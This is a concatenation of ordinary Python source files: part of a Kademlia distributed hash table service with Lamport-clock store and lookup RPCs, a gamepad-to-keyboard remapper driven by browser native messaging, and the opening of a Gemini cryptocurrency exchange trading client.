debug(f'KademliaService.exposed_client_update_network - Unsuccessful ping to peer: {tcontact}')
def exposed_store(self, client: Contact, client_lamport: int, key: int, value: str, store_time: int) -> bool:
debug(f'KademliaService.exposed_store - Trying to store value in key: {key} at time: {store_time}.')
if not self.is_initialized:
error(f'KademliaService.exposed_store - Instance not initialized')
return False, self.lamport
client = Contact.from_json(client)
debug(f'KademliaService.exposed_store - Incoming connection from {client}.')
self.update_lamport(client_lamport)
self.update_contact(client)
try:
debug(f'KademliaService.exposed_store - Acquire lock for data')
self.data_lock.acquire()
actual_value, actual_time = self.data[key]
except KeyError:
actual_value, actual_time = (value, store_time)
finally:
self.data_lock.release()
debug(f'KademliaService.exposed_store - Release lock for data')
self.data_lock.acquire()
self.data[key] = (value, store_time) if store_time > actual_time else (actual_value, actual_time)
self.data_lock.release()
debug(f'KademliaService.exposed_store - End of connection from {client}.')
return True, self.lamport
def exposed_find_node(self, client: Contact, client_lamport: int, id: int) -> list:
if not self.is_initialized:
error(f'KademliaService.exposed_find_node - Instance not initialized')
return None, self.lamport
client = Contact.from_json(client)
debug(f'KademliaService.exposed_find_node - Incoming connection from {client}.')
self.update_lamport(client_lamport)
self.update_contact(client)
result = []
count = 0
table_contacts = self.table.get_closest_buckets(id)
assert table_contacts is not None
for contact in table_contacts:
result.append(contact.to_json())
count += 1
if count >= self.k:
break
debug(f'KademliaService.exposed_find_node - Replying with {result}.')
debug(f'KademliaService.exposed_find_node - End of connection from {client}.')
return result, self.lamport
def exposed_find_value(self, client: Contact, client_lamport: int, key: int) -> object:
if not self.is_initialized:
error(f'KademliaService.exposed_find_value - Instance not initialized')
return None, self.lamport
client = Contact.from_json(client)
debug(f'KademliaService.exposed_find_value - Incoming connection from {client}.')
debug(f'KademliaService.exposed_find_value - Asking for key: {key}.')
self.update_lamport(client_lamport)
self.update_contact(client)
try:
value, stored_time = self.data[key]
debug(f'KademliaService.exposed_find_value - Replying with value: {value} and value_time: {stored_time}.')
debug(f'KademliaService.exposed_find_value - End connection from {client}.')
return (value, stored_time), self.lamport
except KeyError:
debug(f'KademliaService.exposed_find_value - Value not found.')
debug(f'KademliaService.exposed_find_value - End connection from {client}.')
return None, self.lamport
def exposed_client_store(self, key: int, value: str, store_time: int = None) -> bool:
if not self.is_initialized:
error(f'KademliaService.exposed_client_store - Instance not initialized')
return None
debug('KademliaService.exposed_client_store - Starting the queue')
queue = Queue()
debug('KademliaService.exposed_client_store - Starting the visited nodes set')
visited = set()
debug('KademliaService.exposed_client_store - Starting the KClosestNode array')
top_contacts = KContactSortedArray(self.k, key)
debug('KademliaService.exposed_client_store - Starting the semaphore for the queue')
queue_lock = Semaphore()
debug(f'KademliaService.exposed_client_store - Insert self contact: {self.my_contact} to the queue')
queue.put(self.my_contact)
debug(f'KademliaService.exposed_client_store - Insert self contact: {self.my_contact} to the visited nodes set')
visited.add(self.my_contact)
debug(f'KademliaService.exposed_client_store - Insert self contact: {self.my_contact} to the KClosestNode array')
top_contacts.push(self.my_contact)
debug(f'KademliaService.exposed_client_store - Starting the iteration on contacts more closes to key: {key}')
for contact in self.table.get_closest_buckets(key):
debug(f'KademliaService.exposed_client_store - Insert the contact: {contact} to the queue')
queue.put(contact)
debug(f'KademliaService.exposed_client_store - Insert the contact: {contact} to the visited nodes set')
visited.add(contact)
debug(f'KademliaService.exposed_client_store - Insert the contact: {contact} to the KClosestNode array')
top_contacts.push(contact)
if queue.qsize() >= self.a:
debug('KademliaService.exposed_client_store - Initial alpha nodes completed')
break
debug('KademliaService.exposed_client_store - Starting the IterativeManager')
manager = IterativeManager(queue.qsize, self.store_lookup, args=(key, queue, top_contacts, visited, queue_lock))
manager.start()
success = False
time = self.lamport if store_time is None else store_time
debug(f'KademliaService.exposed_client_store - Time for store: {time}')
debug(f'KademliaService.exposed_client_store - Iterate the closest K nodes to find the key: {key}')
for contact in top_contacts:
debug(f'KademliaService.exposed_client_store - Storing key: {key} with value: {value} in contact: {contact}')
result, _ = self.store_to(contact, key, value, time)
if not result:
error(f'KademliaService.exposed_client_store - The store of key: {key} with value: {value} in contact: {contact} was NOT successful')
success = success or result
debug(f'KademliaService.exposed_client_store - Finish method with result: {success}')
return success
def store_lookup(self, key: int, queue: Queue, top: KContactSortedArray, visited: set, queue_lock: Semaphore):
contact = None
try:
debug(f'KademliaService.store_lookup - Removing a contact from the queue')
contact = queue.get(timeout=1)
debug(f'KademliaService.store_lookup - Contact {contact} out of the queue')
except Empty:
debug(f'KademliaService.store_lookup - Empty queue')
return
debug(f'KademliaService.store_lookup - Make the find_node on the contact: {contact}')
result, new_contacts = self.find_node_to(contact, key)
if not result:
debug(f'KademliaService.store_lookup - No connection to the node: {contact} was established')
return
debug(f'KademliaService.store_lookup - Update the table with contact: {contact}')
self.update_contact(contact)
debug(f'KademliaService.store_lookup - Cloning contacts received')
new_contacts = map(Contact.from_json, new_contacts)
debug(f'KademliaService.store_lookup - Iterate by contacts')
for new_contact in new_contacts:
debug(f'KademliaService.store_lookup - Pinging to contact: {new_contact}')
if not self.ping_to(new_contact)[0]:
debug(f'KademliaService.store_lookup - The contact: {new_contact} not respond')
continue
debug(f'KademliaService.store_lookup - Update the table with contact: {new_contact}')
self.update_contact(new_contact)
debug(f'KademliaService.store_lookup - Lock the queue')
queue_lock.acquire()
if new_contact not in visited:
debug(f'KademliaService.store_lookup - The contact: {new_contact} is NOT in the queue')
debug(f'KademliaService.store_lookup - Inserting the contact: {new_contact} to the queue and KClosestNode array and marking as visited')
visited.add(new_contact)
queue_lock.release()
queue.put(new_contact)
top.push(new_contact)
else:
debug(f'KademliaService.store_lookup - The contact: {new_contact} is in the queue')
queue_lock.release()
def exposed_client_find_node(self, id: int) -> list:
if not self.is_initialized:
error(f'KademliaService.exposed_client_find_node - Instance not initialized')
return None
if id == self.my_contact.id:
debug(f'KademliaService.exposed_client_find_node - This node is the node being searched for.')
debug(f'KademliaService.exposed_client_find_node - The node with id was found: {id}, the node is {self.my_contact}')
return self.my_contact.to_json()
debug('KademliaService.exposed_client_find_node - Starting the queue')
queue = Queue()
debug('KademliaService.exposed_client_find_node - Starting the visited nodes set')
visited = set()
debug('KademliaService.exposed_client_find_node - Starting the KClosestNode array')
top_contacts = KContactSortedArray(self.k, id)
debug('KademliaService.exposed_client_find_node - Starting the semaphore for the queue')
queue_lock = Semaphore()
debug(f'KademliaService.exposed_client_find_node - Insert self contact: {self.my_contact} to the queue')
queue.put(self.my_contact)
debug(f'KademliaService.exposed_client_find_node - Insert self contact: {self.my_contact} to the visited nodes set')
visited.add(self.my_contact)
debug(f'KademliaService.exposed_client_find_node - Insert self contact: {self.my_contact} to the KClosestNode array')
top_contacts.push(self.my_contact)
debug(f'KademliaService.exposed_client_find_node - Starting the iteration on contacts more closes to id: {id}')
for contact in self.table.get_closest_buckets(id):
debug(f'KademliaService.exposed_client_find_node - Insert the contact: {contact} to the queue')
queue.put(contact)
debug(f'KademliaService.exposed_client_find_node - Insert the contact: {contact} to the visited nodes set')
visited.add(contact)
debug(f'KademliaService.exposed_client_find_node - Insert the contact: {contact} to the KClosestNode array')
top_contacts.push(contact)
if queue.qsize() >= self.a:
debug('KademliaService.exposed_client_find_node - Initial alpha nodes completed')
break
debug('KademliaService.exposed_client_find_node - Starting the IterativeManager')
manager = IterativeManager(queue.qsize, self.find_node_lookup, args=(id, queue, top_contacts, visited, queue_lock))
manager.start()
debug(f'KademliaService.exposed_client_find_node - Iterate the closest K nodes to find the node: {id}')
for contact in top_contacts:
if contact.id == id:
debug(f'KademliaService.exposed_client_find_node - The node with id was found: {id}, the node is {contact}')
return contact.to_json()
debug('KademliaService.exposed_client_find_node - Finish method without finding the node')
return None
def find_node_lookup(self, id: int, queue: Queue, top: KContactSortedArray, visited: set, queue_lock: Semaphore):
contact = None
try:
debug(f'KademliaService.find_node_lookup - Removing a contact from the queue')
contact = queue.get(timeout=1)
debug(f'KademliaService.find_node_lookup - Contact {contact} out of the queue')
except Empty:
debug(f'KademliaService.find_node_lookup - Empty queue')
return
debug(f'KademliaService.find_node_lookup - Make the find_node on the contact: {contact}')
result, new_contacts = self.find_node_to(contact, id)
if not result:
debug(f'KademliaService.find_node_lookup - No connection to the node: {contact} was established')
return
debug(f'KademliaService.find_node_lookup - Update the table with contact: {contact}')
self.update_contact(contact)
debug(f'KademliaService.find_node_lookup - Cloning contacts received')
new_contacts = map(Contact.from_json, new_contacts)
debug(f'KademliaService.find_node_lookup - Iterate by contacts')
for new_contact in new_contacts:
if new_contact == self.my_contact:
debug(f'KademliaService.find_node_lookup - The new_contact is equal to the my_contact, continue.')
continue
debug(f'KademliaService.find_node_lookup - Pinging to contact: {new_contact}')
if not self.ping_to(new_contact)[0]:
debug(f'KademliaService.find_node_lookup - The contact: {new_contact} not respond')
continue
debug(f'KademliaService.find_node_lookup - Update the table with contact: {new_contact}')
self.update_contact(new_contact)
debug(f'KademliaService.find_node_lookup - Lock the queue')
queue_lock.acquire()
if new_contact not in visited:
debug(f'KademliaService.find_node_lookup - The contact: {new_contact} is NOT in the queue')
debug(f'KademliaService.find_node_lookup - Inserting the contact: {new_contact} to the queue and KClosestNode array and marking as visited')
visited.add(new_contact)
queue_lock.release()
queue.put(new_contact)
top.push(new_contact)
else:
debug(f'KademliaService.find_node_lookup - The contact: {new_contact} is in the queue')
queue_lock.release()
def exposed_client_find_value(self, key: int) -> object:
if not self.is_initialized:
error(f'KademliaService.exposed_client_find_value - Instance not initialized')
return None
debug('KademliaService.exposed_client_find_value - Starting the queue')
queue = Queue()
debug('KademliaService.exposed_client_find_value - Starting the visited nodes set')
visited = set()
debug('KademliaService.exposed_client_find_value - Starting the KClosestNode array')
top_contacts = KContactSortedArray(self.k, key)
debug('KademliaService.exposed_client_find_value - Starting the semaphore for the queue')
queue_lock = Semaphore()
debug(f'KademliaService.exposed_client_find_value - Insert self contact: {self.my_contact} to the queue')
queue.put(self.my_contact)
debug(f'KademliaService.exposed_client_find_value - Insert self contact: {self.my_contact} to the visited nodes set')
visited.add(self.my_contact)
debug(f'KademliaService.exposed_client_find_value - Insert self contact: {self.my_contact} to the KClosestNode array')
top_contacts.push(self.my_contact)
last_value = [None, -1]
debug('KademliaService.exposed_client_find_value - Starting the semaphore for the last value')
last_value_lock = Semaphore()
debug(f'KademliaService.exposed_client_find_value - Starting the iteration on contacts more closes to key: {key}')
for contact in self.table.get_closest_buckets(key):
debug(f'KademliaService.exposed_client_find_value - Insert the contact: {contact} to the queue')
queue.put(contact)
debug(f'KademliaService.exposed_client_find_value - Insert the contact: {contact} to the visited nodes set')
visited.add(contact)
debug(f'KademliaService.exposed_client_find_value - Insert the contact: {contact} to the KClosestNode array')
top_contacts.push(contact)
if queue.qsize() >= self.a:
debug('KademliaService.exposed_client_find_value - Initial alpha nodes completed')
break
debug('KademliaService.exposed_client_find_value - Starting the IterativeManager')
manager = IterativeManager(queue.qsize, self.find_value_lookup, args=(key, queue, top_contacts, visited, queue_lock, last_value, last_value_lock))
manager.start()
debug(f'KademliaService.exposed_client_find_value - Iterate the closest K nodes to find the key: {key}')
value, time = last_value
if value is None:
return None
for contact in top_contacts:
debug(f'KademliaService.exposed_client_find_value - Storing key: {key} with value: {value} in contact: {contact}')
result, _ = self.store_to(contact, key, value, time)
if not result:
error(f'KademliaService.exposed_client_find_value - The store of key: {key} with value: {value} in contact: {contact} was NOT successful')
debug(f'KademliaService.exposed_client_find_value - Finish method with value result: {value}')
return value
def find_value_lookup(self, key: int, queue: Queue, top: KContactSortedArray, visited: set, queue_lock: Semaphore, last_value: list, last_value_lock: Semaphore):
contact = None
try:
debug(f'KademliaService.find_value_lookup - Removing a contact from the queue')
contact = queue.get(timeout=1)
debug(f'KademliaService.find_value_lookup - Contact {contact} out of the queue')
except Empty:
debug(f'KademliaService.find_value_lookup - Empty queue')
return
debug(f'KademliaService.find_value_lookup - Make the find_node on the contact: {contact}')
result, new_contacts = self.find_node_to(contact, key)
if not result:
debug(f'KademliaService.find_value_lookup - No connection to the node: {contact} was established')
return
debug(f'KademliaService.find_value_lookup - Make the find_value on the contact: {contact}')
result, temp = self.find_value_to(contact, key)
if not result:
debug(f'KademliaService.find_value_lookup - No connection to the node: {contact} was established')
return
debug(f'KademliaService.find_value_lookup - Cloning contacts received')
new_contacts = map(Contact.from_json, new_contacts)
if temp:
value, time = temp
debug(f'KademliaService.find_value_lookup - Acquire lock for last value')
last_value_lock.acquire()
debug(f'KademliaService.find_value_lookup - Checking for update last value. Actual Time: {time}, Last Time: {last_value[1]}')
if time > last_value[1]:
debug(f'KademliaService.find_value_lookup - Update the last value')
last_value[0], last_value[1] = value, time
debug(f'KademliaService.find_value_lookup - Release lock for last value')
last_value_lock.release()
debug(f'KademliaService.find_value_lookup - Update the table with contact: {contact}')
self.update_contact(contact)
debug(f'KademliaService.find_value_lookup - Iterate by contacts')
for new_contact in new_contacts:
debug(f'KademliaService.find_value_lookup - Pinging to contact: {new_contact}')
if not self.ping_to(new_contact)[0]:
debug(f'KademliaService.find_value_lookup - The contact: {new_contact} not respond')
continue
debug(f'KademliaService.find_value_lookup - Update the table with contact: {new_contact}')
self.update_contact(new_contact)
debug(f'KademliaService.find_value_lookup - Lock the queue')
queue_lock.acquire()
if new_contact not in visited:
debug(f'KademliaService.find_value_lookup - The contact: {new_contact} is NOT in the queue')
debug(f'KademliaService.find_value_lookup - Inserting the contact: {new_contact} to the queue and KClosestNode array and marking as visited')
visited.add(new_contact)
queue_lock.release()
queue.put(new_contact)
top.push(new_contact)
else:
debug(f'KademliaService.find_value_lookup - The contact: {new_contact} is in the queue')
queue_lock.release()
def exposed_connect_to_network(self, contact: str):
self.exposed_init(contact)
contact = Contact.from_json(contact)
while not self.is_started_node:
try:
if not self.is_initialized:
raise Exception(f'KademliaService.exposed_connect_to_network - Instance not initialized')
try:
service_name = KademliaService.get_name(self.__class__)
debug(f'KademliaService.exposed_connect_to_network - Server name in the connect_to_network: {service_name}')
nodes = discover(service_name)
debug(f'KademliaService.exposed_connect_to_network - Discovered nodes: {nodes}')
except DiscoveryError:
raise Exception(f'KademliaService.exposed_connect_to_network - No service found')
mark = False
for ip, port in nodes:
if ip == self.my_contact.ip and port == self.my_contact.port:
continue
count = 0
while count < 5:
try:
debug(f'KademliaService.exposed_connect_to_network - Establishing connection with {ip}:{port}')
conn = connect(ip, port)
debug(f'KademliaService.exposed_connect_to_network - Pinging to {ip}:{port}')
result, _ = conn.root.ping(self.my_contact.to_json(), self.lamport)
if result:
contact = Contact.from_json(result)
else:
raise Exception(f'KademliaService.exposed_connect_to_network - The contact with address {ip}:{port} is not initialized')
debug(f'KademliaService.exposed_connect_to_network - The contact {contact} responded to the ping correctly')
break
except Exception as e:
error(f'Exception: {e} when trying ping to node with ip: {ip} and port: {port}')
count += 1
if count == 5:
debug(f'KademliaService.exposed_connect_to_network - The service with address {ip}: {port} does not respond')
continue
if contact != self.my_contact:
mark = True
self.update_contact(contact)
if not mark:
raise Exception('KademliaService.exposed_connect_to_network - Not discover node different')
try:
self.exposed_client_find_node(self.my_contact.id)
except Exception as e:
raise Exception(f'KademliaService.exposed_connect_to_network - I can\'t perform the first iterative find node because: {e}')
count_of_buckets = len(self.table)
for i in range(count_of_buckets):
if not self.table.get_bucket(i):
continue
count = 0
while count < 5:
key = randint(2**i, 2**(i + 1) - 1)
try:
self.exposed_client_find_node(key)
break
except Exception as e:
error(f'KademliaService.exposed_connect_to_network - I cannot perform the iterative find node. Exception: {e}')
count += 1
if count == 5:
debug(f'KademliaService.exposed_connect_to_network - I cannot perform the iterative find node')
self.is_started_node = True
debug(f'KademliaService.exposed_connect_to_network - Finish method. Node is started')
return True
except Exception as e:
error(e)
debug('KademliaService.exposed_connect_to_network - Sleep for 0.2 seconds and try to connect to the network again')
sleep(0.2)
return False
def update_values(self, force=False):
if self.update_time is None and not force:
return
debug(f'KademliaService.update_values - Starting')
if self.lamport % self.update_time and not force:
debug(f'KademliaService.update_values - No time for update')
return
thread = Thread(target=self.threaded_update_values, args=(force,))
thread.start()
def threaded_update_values(self, force):
debug(f'KademliaService.update_values - Acquire lock for data')
self.data_lock.acquire()
debug(f'KademliaService.update_values - Copying data for temporal list')
temp = []
for key in self.data:
temp.append((key, self.data[key]))
debug(f'KademliaService.update_values - Clear data')
self.data.clear()
self.data_lock.release()
debug(f'KademliaService.update_values - Release lock for data')
success = False
for i in temp:
debug(f'KademliaService.update_values - Call client store with key: {i[0]}, values: {i[1][0]} and time: {i[1][1]}')
success = success or self.exposed_client_store(i[0], i[1][0], i[1][1])
debug(f'KademliaService.update_values - Finish with result: {success}')
def update_contact(self, contact: Contact):
debug(f'KademliaService.update_contact - Updating contact: {contact}.')
if contact == self.my_contact:
return
if not self.table.update(contact):
bucket = self.table.get_bucket(contact.id)
to_remove = None
bucket.semaphore.acquire()
for stored in bucket:
if not self.ping_to(stored)[0]:
to_remove = stored
if to_remove:
bucket.remove_by_contact(to_remove)
bucket.update(contact)
bucket.semaphore.release()
debug(f'KademliaService.update_contact - Contact updated.')
def update_lamport(self, client_lamport: int = 0):
debug(f'KademliaService.update_lamport - Updating actual time with time: {client_lamport}.')
self.lamport_lock.acquire()
self.lamport = max(client_lamport, self.lamport + 1)
self.lamport_lock.release()
self.update_values()
debug(f'KademliaService.update_lamport - Time updated.')
def connect(self, contact: Contact) -> Connection:
debug(f'KademliaService.connect - Trying to connect with contact: {contact}.')
self.update_lamport()
connection = connect(contact.ip, str(contact.port), timeout=0.5)
# connection.ping()
debug(f'KademliaService.connect - Connection with contact: {contact} stablished.')
return connection
@staticmethod
def get_name(arg) -> str:
name = arg.__name__
service = 'Service'
if name.endswith(service):
return name[:-len(service)]
@try_function()
def ping_to(self, contact: Contact) -> bool:
debug(f'KademliaService.ping_to - Trying ping to contact: {contact}.')
result, peer_time = None, None
if self.my_contact == contact:
result, peer_time = self.exposed_ping(self.my_contact.to_json(), self.lamport)
else:
connection = self.connect(contact)
result, peer_time = connection.root.ping(self.my_contact.to_json(), self.lamport)
self.update_lamport(peer_time)
return result
@try_function()
def store_to(self, contact: Contact, key: int, value: str, store_time: int) -> bool:
debug(f'KademliaService.store_to - Trying store to contact: {contact} for key: {key}.')
result, peer_time = None, None
if self.my_contact == contact:
result, peer_time = self.exposed_store(self.my_contact.to_json(), self.lamport, key, value, store_time)
else:
connection = self.connect(contact)
result, peer_time = connection.root.store(self.my_contact.to_json(), self.lamport, key, value, store_time)
self.update_lamport(peer_time)
return result
@try_function()
def find_node_to(self, contact: Contact, id: int) -> list:
debug(f'KademliaService.find_node_to - Trying find_node to contact: {contact} for id: {id}')
result, peer_time = None, None
if self.my_contact == contact:
result, peer_time = self.exposed_find_node(self.my_contact.to_json(), self.lamport, id)
else:
connection = self.connect(contact)
result, peer_time = connection.root.find_node(self.my_contact.to_json(), self.lamport, id)
self.update_lamport(peer_time)
return result
@try_function()
def find_value_to(self, contact: Contact, key: int) -> object:
        debug(f'KademliaService.find_value_to - Trying find_value to contact: {contact} for key: {key}')
result, peer_time = None, None
if self.my_contact == contact:
result, peer_time = self.exposed_find_value(self.my_contact.to_json(), self.lamport, key)
else:
connection = self.connect(contact)
result, peer_time = connection.root.find_value(self.my_contact.to_json(), self.lamport, key)
self.update_lamport(peer_time)
return result
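# --- Hedged illustration (not part of the original service) ---
# A minimal, standalone sketch of the Lamport-clock merge rule that
# update_lamport() above applies under lamport_lock: on every exchanged
# message the local counter becomes max(peer_time, local + 1).  The
# LamportClock class and its method names are hypothetical and exist only
# for this example.
from threading import Lock


class LamportClock:
    """Tiny thread-safe Lamport counter mirroring update_lamport() above."""

    def __init__(self):
        self._value = 0
        self._lock = Lock()

    def merge(self, peer_time: int = 0) -> int:
        # Advance past both the local history and the peer's reported time.
        with self._lock:
            self._value = max(peer_time, self._value + 1)
            return self._value


# Example: a fresh clock merged with peer_time=10 yields 10; a following
# local-only merge() yields 11.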
|
gamepad-remapper.py
|
#!/usr/bin/python3 -u
import nativemessaging as nm
import os
import threading
import subprocess
import sys
import json
import pyautogui
# prevent pygame from printing and breaking nativemessaging
os.environ["PYGAME_HIDE_SUPPORT_PROMPT"] = ""
import pygame
dirs = {"neg": -1, "pos": 1}
axes = {"x": 0, "y": 1}
def sendKeyPress(key):
# send keypresses
# hotkey if provided a list of keys, single press if only provided one
if type(key) is list:
pyautogui.hotkey(*key)
else:
pyautogui.press(str(key))
def mapping(stop=None, map=None):
    # provide the necessary objects if omitted (avoid a mutable default argument)
    if map is None:
        map = {}
    if "buttons" not in map:
        map["buttons"] = {}
    if "axes" not in map:
        map["axes"] = {}
    if "hats" not in map:
        map["hats"] = {}
pygame.joystick.init()
pygame.display.init()
clock = pygame.time.Clock()
# init joystick
try:
js = pygame.joystick.Joystick(0)
js.init()
except pygame.error:
stop.wait()
    # while the extension hasn't sent a stop message
while stop is None or not stop.is_set():
# use events for single button presses
for event in pygame.event.get():
if event.type == pygame.JOYBUTTONDOWN:
id = str(event.button)
if id in map["buttons"] and map["buttons"][id][1] == "single":
if js.get_button(event.button) == 1:
sendKeyPress(map["buttons"][id][0])
if event.type == pygame.JOYAXISMOTION:
id = str(event.axis)
if id in map["axes"]:
for dir in map["axes"][id].keys():
if map["axes"][id][dir][1] == "single":
if round(event.value) == dirs[dir] and abs(round(event.value) - event.value) <= .001:
sendKeyPress(map["axes"][id][dir][0])
if event.type == pygame.JOYHATMOTION:
id = str(event.hat)
if id in map["hats"]:
for axis in map["hats"][id]:
for dir in map["hats"][id][axis]:
if map["hats"][id][axis][dir][1] == "single":
if event.value[axes[axis]] == dirs[dir]:
sendKeyPress(map["hats"][id][axis][dir][0])
# use loop for repeating
for button in map["buttons"].keys():
if map["buttons"][button][1] == "repeat":
if js.get_button(int(button)) == 1:
sendKeyPress(map["buttons"][button][0])
for axis in map["axes"].keys():
for dir in map["axes"][axis]:
if map["axes"][axis][dir][1] == "repeat":
if round(js.get_axis(int(axis))) == dirs[dir]:
sendKeyPress(map["axes"][axis][dir][0])
for hat in map["hats"].keys():
for axis in map["hats"][hat]:
for dir in map["hats"][hat][axis]:
if map["hats"][hat][axis][dir][1] == "repeat":
if js.get_hat(int(hat))[axes[axis]] == dirs[dir]:
sendKeyPress(map["hats"][hat][axis][dir][0])
clock.tick(60)
if __name__ == "__main__":
# gamepad-remapper@r01 is sent as an arg if run by browser
if "gamepad-remapper@r01" in sys.argv:
gvars = {}
while True:
# wait for message from browser
message = nm.get_message()
if message["action"] == "start":
# create kill variable
gvars["kill"] = threading.Event()
# start mapping using threading (so that the loop works while still waiting for messages from browser)
gvars["t"] = threading.Thread(target=mapping, args=(gvars["kill"], message["config"]))
gvars["t"].start()
# send state and mode variables to browser
nm.send_message(nm.encode_message({"state": "started", "mode": message["config"]["name"]}))
elif message["action"] == "stop":
# activate kill variable
gvars["kill"].set()
gvars["t"].join()
# send state and mode variables to browser
nm.send_message(nm.encode_message({"state": "stopped", "mode": None}))
elif message["action"] == "tester":
# open tester, piping stdout to /dev/null (otherwise breaks nativemessaging)
with open(os.devnull, "w") as fp:
subprocess.Popen("./test.py", stdout=fp)
nm.send_message(nm.encode_message("LAUNCHED TEST"))
else:
print("GAMEPAD REMAPPER")
# if file in args, otherwise ask for file
if len(sys.argv) > 1 and os.path.isfile(sys.argv[1]):
with open(sys.argv[1], "r") as f:
map = json.loads(f.read())
else:
file = input("Please provide a config file: ")
with open(file, "r") as f:
map = json.loads(f.read())
# print configs, choose which to use
keys = []
for key in map:
keys.append(key["name"])
print(" " + key["name"])
config = input("Choose your config: ")
# start mapping
mapping(None, map[keys.index(config)])
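# --- Hedged illustration (not part of the original script) ---
# A sketch of the config shape that mapping() above expects, inferred from how
# it indexes map["buttons"], map["axes"] and map["hats"]: ids are strings,
# every entry is [key_or_key_list, "single" | "repeat"], axis directions are
# "neg"/"pos" and hat axes are "x"/"y".  The concrete ids and keys below are
# made up for illustration; the JSON file passed on the command line holds a
# list of such dicts, each carrying a "name".
def _example_config():
    return {
        "name": "example",
        "buttons": {
            "0": ["space", "single"],        # one key press per button press
            "1": [["ctrl", "w"], "single"],  # a list is sent as a hotkey
        },
        "axes": {
            "1": {
                "neg": ["up", "repeat"],     # stick held in one direction repeats the key
                "pos": ["down", "repeat"],
            },
        },
        "hats": {
            "0": {
                "x": {"neg": ["left", "single"], "pos": ["right", "single"]},
                "y": {"neg": ["down", "single"], "pos": ["up", "single"]},
            },
        },
    }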
|
gemini.py
|
import asyncio
import base64
import hashlib
import hmac
import json
import os
import queue
import ssl
import time
import traceback
from datetime import date, datetime, timedelta
from threading import Thread
from typing import Dict, List, Optional, Tuple
import pandas as pd
import requests
import websocket
from pytz import timezone
from liualgotrader.common import config
from liualgotrader.common.assets import get_asset_min_qty, round_asset
from liualgotrader.common.tlog import tlog
from liualgotrader.common.types import Order, QueueMapper, ThreadFlags, Trade
from liualgotrader.trading.base import Trader
utctz = timezone("UTC")
class GeminiTrader(Trader):
gemini_api_key: Optional[str] = os.getenv("GEMINI_API_KEY")
gemini_api_secret: Optional[str] = os.getenv("GEMINI_API_SECRET")
base_url = "https://api.sandbox.gemini.com"
base_websocket = "wss://api.sandbox.gemini.com"
last_nonce = None
def __init__(self, qm: QueueMapper = None):
self.running_task: Optional[Thread] = None
self.hb_task: Optional[Thread] = None
self.send_hb = True
self.ws = None
self.flags: Optional[ThreadFlags] = None
super().__init__(qm)
@classmethod
def _generate_request_headers(cls, payload: Dict) -> Dict:
if not cls.gemini_api_secret or not cls.gemini_api_key:
raise AssertionError(
"both env variables GEMINI_API_KEY and GEMINI_API_SECRET must be set up"
)
t = datetime.now()
payload_nonce = int(time.mktime(t.timetuple()) * 1000)
if cls.last_nonce and cls.last_nonce == payload_nonce:
payload_nonce += 1
cls.last_nonce = payload_nonce
payload["nonce"] = str(payload_nonce)
encoded_payload = json.dumps(payload).encode()
b64 = base64.b64encode(encoded_payload)
signature = hmac.new(
cls.gemini_api_secret.encode(), b64, hashlib.sha384
).hexdigest()
return {
"Content-Type": "text/plain",
"Content-Length": "0",
"X-GEMINI-APIKEY": cls.gemini_api_key,
"X-GEMINI-PAYLOAD": b64,
"X-GEMINI-SIGNATURE": signature,
"Cache-Control": "no-cache",
}
def _generate_ws_headers(self, payload: Dict) -> Dict:
if not self.gemini_api_secret or not self.gemini_api_key:
raise AssertionError(
"both env variables GEMINI_API_KEY and GEMINI_API_SECRET must be set up"
)
t = datetime.now()
payload_nonce = str(int(time.mktime(t.timetuple()) * 1000))
payload["nonce"] = payload_nonce
encoded_payload = json.dumps(payload).encode()
b64 = base64.b64encode(encoded_payload)
signature = hmac.new(
self.gemini_api_secret.encode(), b64, hashlib.sha384
).hexdigest()
return {
"X-GEMINI-APIKEY": self.gemini_api_key,
"X-GEMINI-PAYLOAD": b64.decode(),
"X-GEMINI-SIGNATURE": signature,
}
@classmethod
def _get_order_event_type(cls, order_data: Dict) -> Order.EventType:
return (
Order.EventType.canceled
if order_data["is_cancelled"] == True
else Order.EventType.fill
if order_data["remaining_amount"] == "0"
else Order.EventType.partial_fill
)
@classmethod
def _get_trade_event_type(cls, trade_data: Dict) -> Order.EventType:
return (
Order.EventType.canceled
if trade_data["type"] == "cancelled"
else Order.EventType.rejected
if trade_data["type"] == "rejected"
else Order.EventType.canceled
if trade_data["type"] == "cancel_rejected"
else Order.EventType.fill
if trade_data["remaining_amount"] == "0"
else Order.EventType.partial_fill
)
@classmethod
def _get_order_side(cls, order_data: Dict) -> Order.FillSide:
return (
Order.FillSide.buy
if order_data["side"] == "buy"
else Order.FillSide.sell
)
@classmethod
def _order_from_dict(cls, order_data: Dict) -> Order:
trades = order_data.get("trades", [])
trade_fees: float = 0.0 + sum(float(t["fee_amount"]) for t in trades)
return Order(
order_id=order_data["order_id"],
symbol=order_data["symbol"].lower(),
filled_qty=float(order_data["executed_amount"]),
event=cls._get_order_event_type(order_data),
price=float(order_data["price"]),
side=cls._get_order_side(order_data),
submitted_at=pd.Timestamp(
ts_input=order_data["timestampms"], unit="ms", tz="UTC"
),
avg_execution_price=float(order_data["avg_execution_price"]),
remaining_amount=float(order_data["remaining_amount"]),
trade_fees=trade_fees,
)
@classmethod
def _trade_from_dict(cls, trade_dict: Dict) -> Trade:
tlog(f"GEMINI GOING TO SEND {trade_dict}")
return Trade(
order_id=trade_dict["order_id"],
symbol=trade_dict["symbol"].lower(),
event=cls._get_trade_event_type(trade_dict),
filled_qty=float(trade_dict["fill"]["amount"])
if "fill" in trade_dict
else 0.0,
trade_fee=float(
trade_dict["fill"]["fee"] if "fill" in trade_dict else 0.0
)
if "fill" in trade_dict
else 0.0,
filled_avg_price=float(trade_dict["avg_execution_price"] or 0.0),
liquidity=trade_dict["fill"]["liquidity"]
if "fill" in trade_dict
else "",
updated_at=pd.Timestamp(
ts_input=trade_dict["timestampms"], unit="ms", tz="UTC"
),
side=Order.FillSide[trade_dict["side"]],
)
async def is_fractionable(self, symbol: str) -> bool:
return True
def check_error(self, result: Dict):
if result.get("result") == "error":
raise AssertionError(
f"[EXCEPTION] {result['reason']}:{result['message']}"
)
async def is_order_completed(
self, order_id: str, external_order_id: Optional[str] = None
) -> Tuple[Order.EventType, float, float, float]:
order = await self.get_order(order_id)
return (
order.event,
order.avg_execution_price,
order.filled_qty,
order.trade_fees,
)
def get_market_schedule(
self,
) -> Tuple[Optional[datetime], Optional[datetime]]:
return (
datetime.today().replace(
hour=0, minute=0, second=0, microsecond=0, tzinfo=utctz
),
datetime.today().replace(
hour=23, minute=59, second=59, microsecond=0, tzinfo=utctz
),
)
def get_trading_days(
self, start_date: date, end_date: date = date.today()
) -> pd.DataFrame:
return pd.DataFrame(
index=pd.date_range(start=start_date, end=end_date)
)
def get_position(self, symbol: str) -> float:
